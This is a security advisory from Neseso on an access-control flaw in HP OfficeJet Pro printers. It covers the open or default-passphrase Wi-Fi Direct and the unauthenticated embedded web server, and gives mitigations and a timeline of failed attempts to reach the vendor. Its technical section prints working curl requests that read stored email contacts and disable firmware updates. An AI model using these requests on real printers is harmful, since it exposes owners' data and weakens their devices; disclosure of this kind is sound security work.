HP Printers Wi-Fi Direct Improper Access Control -------------------------------------------------------------------------------- 1. Advisory Information Title: HP Printers Wi-Fi Improper Access Control Advisory ID: NESESO-2017-0111 Advisory URL: http://neseso.com/advisories/NESESO-2017-0111.pdf Date published: 2017-02-01 Date of last update: 2017-02-01 Vendors contacted: Hewlett Packard Release mode: User Release -------------------------------------------------------------------------------- 2. Vulnerability Information Class: Configuration [CWE-16], Improper Access Control [CWE-284] Impact: Security bypass Remotely Exploitable: Yes Locally Exploitable: No -------------------------------------------------------------------------------- 3. Vulnerability Description HP printers with Wi-Fi Direct support, let you print from a mobile device directly to the printer without connecting to a wireless network. Several of these printers are prone to a security vulnerability that allows an external system to obtain unrestricted remote read/write access to the printer configuration using the embedded web server. -------------------------------------------------------------------------------- 4. Vulnerable Packages HP OfficeJet Pro 8710 firmware version WBP2CN1619BR HP OfficeJet Pro 8620 firmware version FDP1CN1547AR Other products and versions might be affected too, but they were not tested. -------------------------------------------------------------------------------- 5. Vendor Information, Solutions and Workarounds There was no official answer from HP Inc. after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be: • Disable Wi-Fi Direct functionality to protect your device. • Enable Password Settings on the Embedded Web Server. -------------------------------------------------------------------------------- 6. Credits This vulnerability was discovered and researched by a member from Neseso Research Team. -------------------------------------------------------------------------------- 7. Technical Description Wi-Fi Direct Improper Access Control Wi-Fi Direct [1], initially called Wi-Fi P2P, is a Wi-Fi standard enabling devices to easily connect with each other without requiring a wireless access point. It is useful for everything from internet browsing to file transfer, and to communicate with one or more devices simultaneously at typical Wi-Fi speeds. In a scenario where two devices want to connect they can authenticate using methods such as PIN, Push-Button or NFC. HP Printers implement Wi-Fi Direct[2] support in two ways, one as described on the Wi-Fi Direct specification and the other providing a wi-fi access point that has no security or uses insecure default credentials (12345678 passphrase is used by default on newer models). Giving access to anyone that is near enough to establish a Wi-Fi connection without any user interaction or notification. The second vulnerability is that the printing services and others, such as the Embedded Web Server has no authentication by default which gives anyone the ability to not only access sensitive information but also modify device configuration. These two vulnerabilities exposes user information and gives unrestricted remote read/write access to the configuration and services of the printer. Below two examples of HTTP requests that attackers could use to access emails stored on the device or disable automatic firmware updates. $ curl -v --insecure https://192.168.223.1/DevMgmt/Email/Contacts * Trying 192.168.223.1... * Connected to 192.168.223.1 (192.168.223.1) port 443 (#0) * TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256 * Server certificate: HP16B465 GET /DevMgmt/Email/Contacts HTTP/1.1 Host: 192.168.223.1 User-Agent: curl/7.43.0 Accept: */* < HTTP/1.1 200 OK < Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number: XXXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR} < Content-Type: text/xml < Content-Length: 203 < Cache-Control: must-revalidate, max-age=0 < Pragma: no-cache < * Connection #0 to host 192.168.1.17 left intact <emaildyn:EmailContacts xmlns:dd="http://www.hp.com/schemas/imaging/con/dictiona ries/1.0/" xmlns:emaildyn="http://www.hp.com/schemas/imaging/con/ledm/emailservi cedyn/2010/11/22"></emaildyn:EmailContacts> $ cat data.xml <?xml version="1.0" encoding="UTF-8"?> <fwudyn:FirmwareUpdateConfig xsi:schemaLocation="http://www.hp.com/schemas/imagi ng/con/ledm/firmwareupdatedyn/2010/12/12 ../../schemas/FirmwareUpdateDyn.xsd" xm lns:fwudyn="http://www.hp.com/schemas/imaging/con/ledm/firmwareupdatedyn/2010/12 /12" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";> <fwudyn:AutomaticCheck>disabled</fwudyn:AutomaticCheck> <fwudyn:AutomaticUpdate>disabled</fwudyn:AutomaticUpdate> </fwudyn:FirmwareUpdateConfig> $ curl -v -X PUT --insecure -d @data.xml https://192.168.223.1/FirmwareUpdate/We bFWUpdate/Config --header "Content-Type:text/xml" * Trying 192.168.223.1... * Connected to 192.168.223.1 (192.168.223.1) port 443 (#0) * TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256 * Server certificate: HP16B465 PUT /FirmwareUpdate/WebFWUpdate/Config HTTP/1.1 Host: 192.168.223.1 User-Agent: curl/7.43.0 Accept: */* Content-Type:text/xml Content-Length: 487 * upload completely sent off: 487 out of 487 bytes < HTTP/1.1 200 OK < Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number: XXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR} < Content-Length: 0 < Cache-Control: must-revalidate, max-age=0 < Pragma: no-cache < * Connection #0 to host 192.168.223.1 left intact Attackers can do other attacks such as setting a proxy, doing configuration backups, getting network information among others. -------------------------------------------------------------------------------- 8. Report Timeline 2017-01-11: Neseso attempted to contact HP Inc. security contact. 2017-01-13: Neseso attempted to contact HP Inc. security contact. 2017-01-16: Neseso attempted to contact HP Inc. security contact for third time using the web form to report vulnerabilities on Hewlett Packard Enterprise site. 2017-01-17: HP Enterprise contact reply that printers vulnerabilities must be reported to contact HP Inc. 2017-01-17: Neseso asked HP Enterprise if there is other security contact for HP Inc. besides the one used before. 2017-01-17: HP Enterprise security contact replied that the security contact for HP Inc. is correct and we should contact them. 2017-01-17: Neseso attempted for fourth time to contact HP Inc. security contact. 2017-01-23: Neseso notifies that if the vendor refuses to response the advisory will be released on February 1st, 2017. 2017-01-26: Neseso informed HP Inc. that it is their last chance to answer the emails, if not the advisory was going to be released on February 1st, 2017. 2017-02-01: Advisory NESESO-2017-0111 published as 'user release'. -------------------------------------------------------------------------------- 9. References [1] - http://www.wi-fi.org/discover-wi-fi/wi-fi-direct [2] - http://www8.hp.com/us/en/ads/mobility/wireless-direct-printing.html -------------------------------------------------------------------------------- 10. About Neseso Neseso is an independent security consulting company with more than 10 years of experience in security research and vulnerability assessment. -------------------------------------------------------------------------------- 11. Copyright Notice The contents of this advisory are copyright (c) 2016 Neseso and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 4.0 License: http://creativecommons.org/licenses/by-nc-sa/4.0/